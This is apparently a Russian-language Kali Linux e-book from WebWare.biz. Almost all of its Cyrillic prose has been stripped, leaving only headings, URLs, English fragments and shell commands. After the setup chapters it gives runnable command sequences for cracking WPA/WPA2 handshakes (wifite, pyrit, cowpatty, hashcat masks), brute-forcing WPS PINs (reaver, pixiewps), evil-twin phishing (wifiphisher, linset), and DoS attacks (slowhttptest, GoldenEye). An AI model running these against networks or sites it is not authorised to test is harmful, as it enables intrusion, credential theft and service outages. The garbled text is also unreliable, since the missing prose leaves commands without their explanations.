( WebWare.biz)
, , :
(alex@webware.biz)
: WebWare.biz
.
, - !
1. Kali Linux ... 6
Kali Linux? ... 6
Kali Linux: ... 7
VirtualBox Guest Additions Kali Linux 1.1.0 ... 23
Kali Linux ( ... 24
VMware Kali ... 43
VPN Kali Linux VPN ... 44
Kali Linux ... 49
2. Kali Linux ... 51
Kali Linux 1.1.0. 1. ... 51
Kali Linux 1.1.0. 2. ... 58
3. ... 77
Wi-Fi (WPA/WPA2), pyrit cowpatty Kali Linux ... 77
Wifi WPA/WPA2 Reaver ... 81
Reaver t6x Pixie Dust ... 85
WPA2/WPA Hashcat Kali Linux ( Wi-Fi ) ... 90
Wifite Pixiewps ... 95
Wi-Fi : , Kali Linux ... 97
Router Scan by StasM Kali Linux ( Wi-Fi ) ... 104
4. - ... 109
- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow body slow read ... 109
- : DoS - Kali Linux GoldenEye ... 117
- Low Orbit Ion Cannon (LOIC) ... 123
5. - ... 129
SQLMAP Kali Linux: - SQL- ... 129
WordPress: WPScanner Plecost ... 138
W3af Kali Linux ... 142
Metasploit Framework Kali Linux ... 145
- Kali Linux .
WebWare.biz.
WebWare.biz : -
- ( ), . (
) .
, ,
.
- , .
- , ,
, ,
- . - , .
. ,
Shift+Delete.
- . : ,
, . ,
, WebWare.biz. -
WebWare.biz . , - ,
( , , ) -
.
. ( -,
, ,
). , , ,
,
http://webware.biz/?page_id=27 .
, , ,
http://webware.biz/?p=3327, , .
: . -
, : http://webware.biz/?p=3920.
,
. .. .
- , http://webware.biz/?p=3920,
, , .
- , :
http://webware.biz/?goto=3
VPS - , , :
http://webware.biz/?goto=478388
- : WebWare.biz
: http://webware.biz/?p=3920
, Linux, - ,
WebWare.biz: http://ZaLinux.ru/
1. Kali Linux
Kali Linux?
o ODROID U2/X2
o Samsung Chromebook
Kali , ,
,
Linux.
Kali Linux:
,
, .
, VirtualBox, ,
VirtualBox :
,
( Live-
, ):
.
. . .
, 30 , ,
30 , . . .
, (,
2-3 ),
:
,
, ,
. -
, , . 10
, , :
. -
, Kali Linux:
:
Live- ( ),
. Instal ():
, ,
.
:
( , ):
. .
( , Enter):
Enter:
. :
, :
, :
, . . Kali Linux
:
( , -
):
.iso ,
:
'root' :
Kali Linux
.
Kali Linux (
Linux
Kali Linux :
( ,
Wi-Fi );
(
; )
GPU Wi-Fi-
Wi-Fi-;
, ;
;
Kali Linux .
. ,
(). ,
, Windows .
, (SSD).
( ), (
) , , . , ,
.
VirtualBox.
. Linux ,
. , ,
. , , VirtualBox.
. , ,
Linux. , , , , Debian (64 bit).
64- ,
.
. , , 1 .
.
, :
, .
.
. Kali Linux .
, !
. Kali Linux :
, ( ).
. , Kali Linux . ,
. ,
USB- (
) . Linux Mint.
: , VirtualBox . ..
.
: USB 3 USB 2. VirtualBox
5 USB 3 ( ). ,
.
( - ) Linux
. , . ..
- , -.
, ,
, :
. , .
, Kali.
. USB 3,
.
- :
.
, .
. .
Kali Linux
Windows , ,
. Delete Esc (
). ,
.
, . , USB 3,
. USB 2.
Windows ( ),
Microsoft UEFI. ,
( , ?).
(
):
shutdown.exe /r /o
,
. :
UEFI:
:
, -.
, . Boot,
Boot Option Priorities, :
.
Secure Boot (Disable):
:
! .
F2. Delete.
.
, . .
, Esc F*.
Boot Option Priorities. .
, Windows Boot Manager,
: , Linux
. , Windows
!
:
VirtualBox .
Live- Linux
CD (DVD)-, , .
:
CD (DVD)- ( );
.
( Linux ),
( ).
, . .
VirtualBox, :
Kali Linux Live USB
(Persistence) Kali Live USB
Kali,
. .
VMware Kali
VMware,
VMware,
VMware Kali.
opt open-vm-toolbox, VMware.
open-vm-tools
, , VMware
Kali VMware.
apt-get install open-vm-toolbox
VMware Kali
vmware-tools ,
. vmware-tool
.
cd ~
apt-get install git gcc make linux-headers-$(uname -r)
git clone https://github.com/rasa/vmware-tools-patches.git
cd vmware-tools-patches
ISO VMware, Install VMware Tools
( VMware) . ISO
VMware , ,
:
cd ~/vmware-tools-patches
cp /media/cdrom/VMwareTools-9.9.0-2304977.tar.gz downloads/
./untar-and-patch-and-compile.sh
(, , ,
). .
VPN
. VPN
, . VPN
-
.
VPN ?
11 , VPN.
1. VPN IP .
2. ( WiFi)
3. .
4. .
5. !
6. ( Youtube, NetFlix
BBC Player ..)
7. .
8. /VOIP .
9. , .
10. .
11. .
, VPN .
, , , ,
, ( !), (, Alexa, Google Toolbar . .).
VPN Kali Linux
, Kali Linux VPN . ,
, , , VPN,
- -, .
, .
, .
, .
, , aptitude of apt-get,
-r, Network-Manager.
aptitude -r install, , , ,
( , - 1969 kB,
).
, Network-Manager , aptitude .
, ?
, , ,
VPN .
, , , .
VPN Kali Linux (GNOME)
, , VPN.
,
VPN:
Kali Linux
(
) Kali. ,
. ,
cat /etc/apt/sources.list
:
#
- , - .
, :
# The second repository pattern and the two messages are reconstructed; the original one-liner was cut off.
if grep -qE "deb http://http.kali.org/kali kali main non-free contrib" /etc/apt/sources.list && grep -qE "deb http://security.kali.org/kali-security kali/updates main contrib non-free" /etc/apt/sources.list; then echo -e "\n\nOK: both Kali repositories are listed"; else echo -e "\n\nKali repositories are missing from /etc/apt/sources.list"; fi
. , :
:
echo -e "deb http://http.kali.org/kali kali main non-free contrib\ndeb http://security.kali.org/kali-security kali/updates main contrib non-free" > /etc/apt/sources.list
, sources.list (
). .. - ,
. , .
,
Kali.
:
:
root@WebWare-Kali:~# cat /etc/apt/sources.list
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
.
, :
apt-get update
2. Kali Linux
Kali Linux ,
, ,
.
Information Gathering
.
.
Vulnerability Analysis
.
, ,
( Information Gathering).
Web Applications
-.
. ,
- -,
. , - .
Password Attacks
, (
)
.
Wireless Attacks
. 802.11 , , aircrack,
airmon . ,
RFID Bluetooth. ,
,
Kali .
Exploitation Tools
.
(Vulnerability Assessment)
.
,
, (spoofing).
VoIP
Maintaining Access
(Maintaining Access)
.
,
, ,
, .
Reverse Engineering
, , (debug) .
, ,
, , .
, ,
,
.
Stress Testing
(Stress Testing)
.
,
(
).
Hardware Hacking
Android,
Android,
Forensics
(Forensics)
, .
Reporting Tools
(Reporting tools) ,
.
System Services
Kali. BeEF,
Dradis, HTTP, Metasploit, MySQL, SSH.
Kali Linux , , -,
Kali Linux,
(, ).
. , -
. , ,
, , -,
( . .),
. , !
Kali Linux ,
.
1. HTTrack -
- . ,
PHP . ,
. ,
.
Kali Linux, ,
:
apt-get install httrack
, , ,
HTTrack:
mkdir webware.biz
cd webware.biz
httrack
, , URL ( )
, webware.biz , :
1. ()
2. ()
3.
4. URL
5. URL ( )
0.
. , ,
, (*),
() , , ,
:
HTTrack ( ):
, ,
.
2. fping Nmap
ping, , . ,
ICMP . fping
.
IP ICMP.
DNS ( webware.biz
, ):
dig -t ns webware.biz
4. Fierce
, , webware.biz mail.webware.biz,
cloud,webware.biz, th.webware.biz ..
( ):
fierce -dns webware.biz
zone transfer , .
5. Maltego
: Information Gathering| DNS Analysis| Maltego
Maltego , Kali
Paterva. ,
.
:
, , .
:
6. Nmap
Nmap . Nmap
, , ,
.
, , .
Nmap ,
.
Kali Zenmap. Zenmap Nmap
.
Zenmap ,
.
Zenmap,
Kali Linux | Information Gathering | Network Scanners | zenmap
,
.
:
7. Metagoofil
!
, , , GPS
, ,
- . , ,
.
Metagoofil , :
-d:
-t: (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)
-l: ( 200)
-h: ( "yes" )
-n:
-o: ( )
-f: ,
:
metagoofil -d webware.biz -t doc,pdf -l 200 -n 50 -o applefiles -f results.htm
: ,
, , .
.
:
:
:
, - ( , GPS
, ), - ! -
.
3.
: .
, , , ,
.
, .
,
Wi-Fi.
Wi-Fi (WPA/WPA2), pyrit cowpatty cuda calpp Kali
Linux
Wifi WPA/WPA2 ,
. . ,
.
,
Wifi WPA/WPA2, pyrit cowpatty Kali Linux,
, cuda calpp (cal++),
WiFite . Kali Linux
10 Wifi WPA/WPA2
pyrit, cowpatty WiFite, AMD.
, .
AMD ATI, .
NVIDIA:
1. NVIDIA Kali Linux NVIDIA
Linux
2. NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
1. fglrx AMD ATI fglrx Kali Linux
2. AMD APP SDK Kali Linux
3. CAL++ Kali Linux
4. Pyrit
, Wifi WPA WPA2,
HashCat cudaHashcat oclHashcat Wifi WPA WPA2
. Hashcat ,
, , .
,
,
. Hashcat Wifi WPA/WPA2
MD5, phpBB, MySQL SHA1 . Hashcat
, 1 2 ,
12 . 4 , 3 .
,
, , .
.
: ,
. , Kali Linux,
, . .
802.11 Kali Linux ( USB). ,
,
-, .
handshake WiFite
WiFite, Aircrack-ng, ?
.
:
airmon-ng start wlan0
Kali Linux:
wifite -wpa
wifite wpa2
(wep, wpa or wpa2),
,
wifite
, (
). CLIENTS. ,
clients, .
. all
, , . 1,2 ENTER.
, clients, ,
. . . , .
, , , , -
.
, 1 2 ENTER, WiFite .
ENTER, .
, 1 - , . .
. CTRL+C .
, WIfite, . . :
What do you want to do?

[c]ontinue attacking targets

[e]xit completely.
c, , e . ,
. c .
1 2. , . .
. , , ,
,
.
, (handshake) .
.
/root/hs/BigPond_58-98-35-E9-2B-8D.cap.
, Wifite
.
, ,
:
1. .
2. .
crunch
oclhashcat
, . . 20% ( )
.
.
.cap Wi-Fi
, .
Kali Linux , .
. Kali Linux.
root.
cp /usr/share/wordlists/rockyou.txt.gz .
.
gunzip rockyou.txt.gz
, , WPA2 8 ,
, , 8
63 ( , ,
). , newrockyou.txt.
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt
, :
wc -l newrockyou.txt
9606665 .
.
wc -l rockyou.txt
14344392 . , , ,
.
, wpa.lst.
mv newrockyou.txt wpa.lst
ESSID Pyrit
ESSID Pyrit
pyrit -e BigPond create_essid
: , , NetComm Wireless,
:
pyrit -e 'NetComm Wireless' create_essid
, .
, ESSID, Pyrit
Pyrit
, ESSID Pyrit,
.
wpa.lst Pyrit.
pyrit -i /root/wpa.lst import_passwords
Pyrit, (batch)
,
pyrit batch
,
15019 PMKs ( CAL++).
CUDA NVIDIA, CAL++
AMD, .
100%, 94
. ,
. ,
.
.
1. Pyrit
2. Cowpatty
(handshake) , Pyrit
. .
pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap attack_db
. ,
, . 159159186.00
PMK's 1 . , ,
.
: NVIDIA
CUDA Cpyrit-CUDA. , .
, .
Pyrit, "
Pyrit: IOError: libpcap-error while reading: truncated dump file; tried to read 424 captured
bytes, only got 259".
(handshake) , Pyrit
crunch,
( ),
pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/wpa.lst attack_passthrough
? 7807 PMKs . .
Cowpatty
cowpatty, cowpatty
.
cowpatty
, . Pyrit
cowpatty airolib-ng. ,
cowpatty , .
cowpatty. ,
, cowpatty.
pyrit -e BigPond -o cow.out export_cowpatty
: WPA WPA2 PSK cowpatty
, cowpatty, WPA2/PSK.
cowpatty -d cow.out -s BigPond -r hs/BigPond_58-98-35-E9-2B-8D.cap
, ,
. .
, .
, . ,
. 164823.00 /.
: cowpatty ( ),
/ , 2 . airolib-ng,
.
(handshake) cowpatty, Pyrit
Pyrit.
cow.out Pyrit
pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/cow.out attack_cowpatty
? 31683811 PMKs . ,
Pyrit attack_db. , ,
(batch) .
Pyrit
, , essid .
pyrit -e BigPond delete_essid
. , Wifi
WPA/WPA2 Reaver-WPS. ,
.
, , ,
.
Reaver
Reaver WPS (Wifi Protected Setup) .
WPA/WPA2. Reaver
WPS,
WPS. , Reaver WPA/WPA2
() 4-10 , . ,
WPS .
.. Reaver 2012 , .
https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek. , , Wiire.
Reaver , .
.
, , Wi-Fi
Wi-Fi (WPA/WPA2), pyrit cowpatty
Kali Linux. ( Wifite)
.
.
Wi-Fi :
()
WPS.
.
-,
. -, , ,
, .
WPA2/WPA Hashcat Kali Linux ( Wi-Fi ),
, . ,
, ,
. Hashcat ,
Wifi WPA/WPA2, MD5, phpBB, MySQL, SHA1 .
Reaver WPS
, , WPS.
,
( .. WPA PSK).
, . , ,
Reaver , , .
: . -
. :
, . 10^8
(100,000,000) . ,
, . . , ,
10^7 (10,000,000).
, ,
, . ,
10^4 (10,000) , 10^3 (1,000), . .
.
Reaver , .
, , 11,000. , Reaver
.
,
, 10 .
Reaver
Kali Linux, . (Reaver, libpcap libsqlite3).
Reaver
airmon-ng
, . wlan0.
airmon-ng start <_>
:
airmon-ng start wlan0
Reaver : BSSID . ,
, BSSID :
airodump-ng --wps wlan0mon
M5 M7 WPS 0.1 .
, (
1 ):
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -T .5
WPS , ,
, NACK, .
, M5/M7, NACK .
, , NACK' ( ),
. ,
Reaver , NACK'
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --nack
EAP FAIL
WPS, . , ,
, :
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --eap-terminate
10 WPS,
. ,
, ,
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fail-wait=360
, Reaver 1 .
-d 0 , :
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0
, , dh-small.
Reaver -,
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --dh-small
Reaver, Pixiewps -K 1
Pixiewps
. Reaver t6x Pixie Dust
Kali Linux. . ..
, Reaver.
Pixiewps . -K 1.
, Reaver Pixiewps. ..
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -K 1
Reaver t6x
Pixie Dust.
:
Reaver ;
: -K // pixie-dust reaver; -H // pixiedust-log
reaver; -P // pixiedust-loop reaver
MAC
/ MAC . Reaver
MAC mac, , MAC
, . . .
MAC (
wlan0mon) . MAC
. :
# ifconfig wlan0 down
Reaver?
Reaver WPS (Wifi Protected Setup)
. Reaver WPS,
WPS. , Reaver
WPA/WPA2 () 4-10 ,
. ,
WPS .
- https://code.google.com/p/reaver-wps/. Pro
.
Reaver
.. Reaver 2012 , .
https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek.
, , Wiire.
Reaver, Pixiewps.
, Kali Linux: , , .
Pixiewps
Pixiewps ( Kali Linux, ,
sudo):
sudo apt-get install libssl-dev
.
zip- Download ZIP.
Kali Linux , Linux
.
cd Downloads
unzip pixiewps-master.zip
cd pixiewps-master/src
make
gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
make install

install -D pixiewps /usr/local/bin/pixiewps
install -m 755 pixiewps /usr/local/bin
Reaver t6x
, Kali Linux ,
" ". .
Reaver, .
.
Reaver
apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps
Pixiewps by Wiire , ,
.
Reaver
git clone https://github.com/t6x/reaver-wps-fork-t6x

wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip

cd reaver-wps-fork-t6x*/
cd src/
./configure
make

sudo make install
Reaver
Reaver ,
.
Reaver , . ,
,
reaver -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
, .
:
-i, --interface=<wlan>
-b, --bssid=<mac> BSSID

:
-m, --mac=<mac> MAC
-e, --essid=<ssid> ESSID
-c, --channel=<channel> 802.11 ( -f)
-o, --out-file=<file> - [stdout]
-s, --session=<file>
-C, --exec=<command>

-D, --daemonize reaver
-a, --auto

-f, --fixed
-5, --5ghz 5GHz 802.11
-v, --verbose (-vv )
-q, --quiet
-K --pixie-dust=<> [1] pixiewps PKE, PKR, E-Hash1, E-Hash2, E-Nonce Authkey (Ralink, Broadcom, Realtek)
-Z, --no-auto-pass reaver WPA, pixiewps
-h, --help

:
-o, --out-file=<file>
-n, --probes=<num> [15]
-D, --daemonize wash
-C, --ignore-fcs
-5, --5ghz 5GHz 802.11
-s, --scan
-u, --survey [default]
-P, --file-output-piped Wash . . wash x|y|z...
-g, --get-chipset reaver
-h, --help
:
wash -i mon0
-g // get-chipset
-g wash reaver .
, , . .
reaver (30
).
- ()
,
Hashcat .
Hashcat
Hashcat :
Hashcat
oclHashcat
, Hashcat,
, GPU.
oclHashcat,
MD5, SHA1 . ,
GPU. Bcrypt . -
, ( ),
oclHashcat Hashcat.
Hashcat Linux, OSX Windows. oclHashcat Linux Windows -
OpenCL OSX.
Kali Linux 1.1.0a Radeon HD 7870M Series,
rockyou .
WPA2 WPA Hashcat ( .cap-)
cudaHashcat oclHashcat Hashcat Kali Linux.
oclHashcat, . . AMD GPU.
NVIDIA GPU, cudahashcat.
, CUDA
NVIDIA fglrx AMD. .
NVIDIA:
NVIDIA Kali Linux NVIDIA
Linux
NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
fglrx AMD ATI fglrx Kali Linux
AMD APP SDK Kali Linux
CAL++ Kali Linux
Pyrit
Hashcat WPA WPA2?
Pyrit , WPA2 WPA.
Hashcat WPA2 WPA?
?
Hashcat
. , , .
Hashcat
WPA2 WPA.
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
, 12345678.
?d?d?d?d?d?d?d?d
, 12345678 23456789
01567891. , .
, ABCFEFGH LKHJHIOP ZBTGYHQS . .,
:
?u?u?u?u?u?u?u?u
.
, : abcdefgh dfghpoiu bnmiopty
. ., :
?l?l?l?l?l?l?l?l
. , .
, a1b2c3d4 p9o8i7u6 n4j2k5l6 . . (
), :
?l?d?l?d?l?d?l?d
, A1B2C3D4 P9O8I7U6 N4J2K5L6 . .
( ), :
?u?d?u?d?u?d?u?d
, , .
,
:
?a?a?a?a?a?a?a?a
: ?a , .
, .
.
- ,
.
. . ,
, abc, -
. :
abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u?d?d?l
abc?d?d?l?u?l
- , 125 .
. cudaHashcat
oclHashcat Hashcat Kali Linux WPA2 WPA .
,
. .
, , ,
, ,
.
: Abcde123
:
?u?l?l?l?l?d?d?d
.
Hashcat
.
:
--custom-charset1=CS
--custom-charset2=CS
--custom-charset3=CS
--custom-charset4=CS
CS . CS
, . . ,
, .
: -1, -2, -3 -4.
hashcat ( .hcchr,
/, ).
:
,
abcdefghijklmnopqrstuvwxyz0123456789 (aka lalpha-
numeric):
-1 abcdefghijklmnopqrstuvwxyz0123456789
-1 abcdefghijklmnopqrstuvwxyz?d
-1 ?l0123456789
-1 ?l?d
-1 loweralpha_numeric.hcchr # , + (abcdefghijk
, 0123456789abcdef:
-1 ?dabcdef
7- ascii charset (aka mixalpha-
numeric-all-space):
-1 ?l?d?s?u
(-1)
, :
-1 charsets/special/Russian/ru_ISO-8859-5-special.hcchr
Kali Linux .hcchr
:
tree /usr/share/maskprocessor/charsets/

tree /usr/share/hashcat/charsets/
: abc, 8 ,
.
, :
, ,
:
-1 ?l?d?u
:
abc?1?1?1?1?1
, , 1. l .
. ()
. , ,
Wifi WPA2 WPA pyrit cowpatty Kali Linux. ,
.
.cap wpaclean
.cap , Hashcat
(cudaHashcat oclHashcat).
.cap Kali Linux.
wpaclean <out.cap> <in.cap>
, , , ,
<out.cap> <in.cap>. , <in.cap> <out.cap>. ,
.
:
wpaclean hs/out.cap hs/Narasu_3E-83-E7-E9-2B-8D.cap
.cap .hccap
, Hashcat (cudaHashcat
oclHashcat).
.hccap aircrack-ng
-J
aircrack-ng <out.cap> -J <out.hccap>
-J J j.
:
aircrack-ng hs/out.cap -J hs/out
WPA2 WPA Hashcat
Hashcat (cudaHashcat oclHashcat) .
:
- , Rockyou.
, / ..
, WPA2
WPA. MD5, phpBB, MySQL
SHA1 Hashcat Kali Linux. :
hashcat --help | grep WPA
.. 2500.
:
hashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
. , :
oclHashcat --force -m 2500 /root/hs/out.hccap /root/rockyou.txt
oclHashcat.
, cudaHashcat, :
cudaHashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
, .
. ,
.
, , Pyrit -
cudaHashcat oclHashcat Hashcat.
, . ,
MD5, phpBB, MySQL SHA1 Hashcat Kali Linux
.
. .
WPA WPA2 Hashcat (cudaHashcat oclHashcat)
:
hashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d
-m = 2500 WPA2 WPA.
-a = 3 ( ).
capture.hccap = .cap.
wpaclean aircrack-ng.
?d?d?d?d?d?d?d?d = , d = . ,
, , 78964352 12345678 ..
, .
, .
, . ,
webware-1.hcmask. .
/usr/share/oclhashcat/masks/webware-1.hcmask.
, , oclHashcat :
ls /usr/share/oclhashcat/masks/
,
:
cudahashcat -m 2500 -a 3 /root/hs/out.hccap /usr/share/oclhashcat/masks/webware-1.hcmask
.hcmask file
.hcmask :
tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask
Hashcat (cudaHashcat
oclHashcat) .
Hashcat (cudaHashcat oclHashcat) .
, Hashcat.
, . . /root.
cat hashcat.pot
. ,
hashcat.net, .
.
, : ,
, , , ,
.
( ),
WebWare.biz. , !
Wifite Pixiewps
Pixiewps. :
1. pixie dust attack
2. Pixiewps Wiire
3. Pixiewps Reaver (t6x)
Kali Linux , ,
. Kali
,
.
, ,
. ,
.
. (Wi-Fi).
,
.
,
. .
, . . .
Kali?,
: .
:
;
;
;
() ;
/ / ,
.
( ) ,
,
. ,
. , ,
.
,
. .
cd ~
mkdir opt
wifiphisher
: https://github.com/sophron/wifiphisher
Wifiphisher WiFi
.
. .. .
WPA/WPA2.
Wifiphisher Kali Linux MIT .
, :
1. . Wifiphisher
wifi
(deauth)
, .
2. . Wifiphisher
. ,
. NAT/DHCP
. , -
. --.
3.
. wifiphisher - HTTP & HTTPS
. , wifiphisher
, , , ,
, WPA .
wifiphisher
, .
hostapd, , , :
apt-get install hostapd
wifiphisher
cd ~/opt
git clone https://github.com/sophron/wifiphisher
cd wifiphisher/
:
python wifiphisher.py
wifiphisher?
,
,
waidps. .
waidps
: https://github.com/SYWorks/waidps
waidps , .
.
.
. .
, waidps
. .
WAIDPS , Python
Linux. , Kali,
/ . .. Kali Linux
.
, ( ) ,
( WEP/WPA/WPS)
( ). , WiFi
.
: MAC SSID
.
WAIDS , ,
,
. .
, , .
WAIDS (
, WIDS):
Association / Authentication flooding
,
WPA
WEP ARP
WEP chopchop
WPS Reaver, Bully ..
- (Evil-Twin)
waidps
cd ~/opt
git clone https://github.com/SYWorks/waidps
cd waidps
python waidps.py
:
Chopchop:
Chopchop :
Chopchop :
3vilTwinAttacker
: https://github.com/P0cL4bs/3vilTwinAttacker
Wi-Fi,
, .
:
Kali linux.
Ettercap.
Sslstrip.
Airbase-ng aircrack-ng.
DHCP.
Nmap.
3vilTwinAttacker
cd ~/opt
git clone https://github.com/P0cL4bs/3vilTwinAttacker
cd 3vilTwinAttacker
chmod +x install.sh
./install.sh --install
python 3vilTwin-Attacker.py
[ DHCP Debian ]
Ubuntu
$ sudo apt-get install isc-dhcp-server
Kali linux
apt-get install isc-dhcp-server
[ DHCP redhat ]
Fedora
$ sudo yum install dhcp
linset
: https://github.com/vk496/linset
linset " " (Evil Twin Attack).
linset
.
Kali Linux ( ).
. :
apt-get install isc-dhcp-server lighttpd macchanger php5-cgi macchanger-gtk
. linset , ,
.
:
cd ~/opt
git clone https://github.com/vk496/linset
cd linset
chmod +x linset
./linset
linset
( )
-
,
DHCP
DNS
-
,
, , -
,
,
. ..
.
, .
, , ,
. ,
. , , ( nmap,
PHP) ,
. ,
Stas'M, curl.
:
- :
Wi-Fi -
;
Wi-Fi ( ),
IP , , IP - .
,
IP, IP .
, , , :
mvd.ru
4. -
- ,
, () .
, mod_evasive
DoS .
-:
- Apache mod_security mod_evasive CentOS
DoS:
- Low Orbit Ion Cannon (LOIC)
- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow body slow
read ( )
SlowHTTPTest ,
(DoS) .
Linux, OSX Cygwin (Unix-
Microsoft Windows).
DoS
, Slowloris, slow body, Slow Read (
TCP), , Apache
Range Header,
.
Slowloris Slow HTTP POST DoS , HTTP, ,
, .
HTTP ,
, .
, .
HTTP, HTTP .
Slow Read , slowloris slow body,
, HTTP , .
SlowHTTPTest
Kali Linux
Kali Linux apt-get .. ( !)
apt-get install slowhttptest
Linux
, . .
, , , .
: SlowHTTPTest,
:
.. , .
, , .
$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure --prefix=PREFIX
$ make
$ sudo make install
PREFIX , slowhttptest
.
libssl-dev .
.
Mac OS X
Homebrew:
brew update && brew install slowhttptest
Linux
, slowhttptest (
Kali Linux).
SlowHTTPTest
slowhttptest , .
.
slow body a.k.a R-U-Dead-Yet,
slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.37/info.php -x 10 -p 3
,
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.37/info.php -x 10 -p 3
[Chart: Test results against http://192.168.1.37/info.php; series: Closed, Pending, Connected, Service available; axes: Seconds, Connections]
, ,
. , . ,
,
.
Slow Read .
x.x.x.x:8080 , - IP
:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://192.168.1.37/info.php -p 5 -l 350 -e x.x.x.x:8080
:
SlowHTTPTest
,
5 , (
1), ( 4).
-g CSV, HTML,
Google Chart.
,
.
CSV
, MS Excel, iWork Numbers Google Docs.
, , ,
:
Hit test time limit , -l
No open connections left
Cannot establish connection N ,
N -i, 10 ( ).
.
Connection refused (
? )
Cancelled by user Ctrl-C SIGINT -
Unexpected error .
SlowHTTPTest
, .
,
. .
, http://192.168.1.37 1000 .
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168
-
root@WebWare-Debian:~# netstat | grep http | wc -l
111
, . . SSH
. http 111 10 .
(
VPS).
DoS
DoS , , ,
( ),
DoS , , SlowHTTPTest
.
, ,
- ,
. , DoS IP
() . .
,
-.
Windows, Linux Mac. DoS
, GoldenEye, hping3 -,
. DoS (,
- ). , ,
-, .
WebWare.biz!
WebWare.biz DoS,
HTTP, - .
GoldenEye , , 30
, , . ,
WAF, IDS.
- .
iptables/
.
GoldenEye:
: GoldenEye
: Jan Seidl
-: http://wroot.org/
GoldenEye:
1.
.
2. GoldenEye
!
3. GoldenEye HTTP DoS.
4. : HTTP Keep Alive + NoCache
DoS DDoS
DoS . DDoS.
DoS DDoS :
1. DoS DDoS
2. DoS DDoS
3. DoS DDoS
DoS DDoS
DoS DDoS , Windows, Apache,
OpenBSD .
DoS DDoS
DoS DDoS .
Synflood, Ping of Death .
DoS DDoS
ICMP-, UDP- ,
.
DoS DDoS . ,
DoS . ( )
DDoS . , , , . .
/.
GoldenEye
, , ~/opt.
, :
mkdir opt
cd opt
, GoldenEye,
GoldenEye ( ):
mkdir GoldenEye && cd GoldenEye && wget https://github.com/jseidl/GoldenEye/archive/master
, .
GoldenEye, :
root@WebWare-Kali:~/opt# mkdir GoldenEye
root@WebWare-Kali:~/opt# cd GoldenEye
root@WebWare-Kali:~/opt/GoldenEye# wget https://github.com/jseidl/GoldenEye/archive/master.zip
master.zip.
unzip master.zip
GoldenEye-master,
:
ls
cd GoldenEye-master/
ls
GoldenEye -
, :
./goldeneye.py
:
. .
: ( )
. ,
.
.
, .
:
root@WebWare-Kali:~/opt/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/
()
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
()
python goldeneye.py http://www.goldeneyetestsite.com/
, , .
GoldenEye:
top:
.. , ,
350 .
./goldeneye.py http://192.168.1.37/info.php
, - ,
, .
, ( -
, ).
GoldenEye
:
cat /var/log/apache2/access.log | grep -E '192.168.1.55'
grep -E '192.168.1.55', ,
.
:
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?vySSDx=tG1rmfX4HbYXBm&CKV
Safari/535.17"
192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET /info.php?dC1FyXpw=hB6Oh&rjcf74A=YV
AppleWebKit/536.12 (KHTML, like Gecko) Chrome/10.0.623.89 Safari/536.26"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?0Nk7p=kSf&1eVF8PNy=UpDtxpDmJ
Firefox/12.0"
192.168.1.55 - - [18/Jun/2015:17:06:51
"http://www.google.com/gCqMk2Q05?DxQe=67gW4HUd3iTKCu2qWSJ&ngWHMmS1=5XyoGh6q2
(Linux x86_64; X11) Gecko/20010905 Firefox/17.0"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?jA5Kw=fwtSMfaPQ8XtCaK&Y0fBbD
, GET ,
, Bing, Baidu, Yandex
.
, - ?
, URL, Referrer
200 OK. ? .
, ,
, IP ( IP
?) (Firefox, Chrome, MSIE, Safari . .),
(Mac, Linux, Windows ..) . ,
URL , -
,
(, Apache worker/socket). - X
IP /
,
(HTTP 503 ). ,
proxy/VPN .
